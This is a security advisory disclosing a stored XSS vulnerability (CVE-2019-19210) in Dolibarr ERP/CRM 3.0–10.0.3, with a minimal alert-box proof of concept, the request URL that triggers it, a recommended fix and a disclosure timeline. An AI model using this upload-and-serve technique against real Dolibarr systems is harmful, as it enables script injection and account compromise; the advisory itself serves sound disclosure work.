usd-2019-0052 | Dolibarr ERP/CRM ver. 3.0 – 10.0.3


Advisory ID: usd-2019-0052
CVE Number: CVE-2019-19210
Affected Product: Dolibarr ERP/CRM
Affected Version: 3.0 – 10.0.3
Vulnerability Type: Stored XSS
Security Risk: High
Vendor URL: https://www.dolibarr.org/
Vendor Status: Fixed (not verified)

Description

An authenticated user can upload a malicious html file as a product document. Even though the file gets the extension „.noexe“, document.php serves files with the content-type „text/html“. This also works with SVG files.

Proof of Concept (PoC)

test.html:

<html>
<body>
<script>alert(„XSS“)</script>
</body>
</html>

Request the uploaded document:

/dolibarr/htdocs/document.php?modulepart=produit&amp;entity=1&amp;attachment=0&amp;file=1234%2F1234-test.html.noexe

Fix

Do not serve user files with an content-type that allows the interpretation of HTML, for example use „application/octet-stream“.

Timeline

  • 2019-09-06 Vulnerability discovered by Daniel Hoffmann
  • 2019-09-11 First contact with vendor
  • 2019-10-30 Vendor released version 10.0.3 which fixes the vulnerability (not verified)
  • 2020-02-05 Security advisory released

Credits

This security vulnerability was discovered by Daniel Hoffmann of usd AG.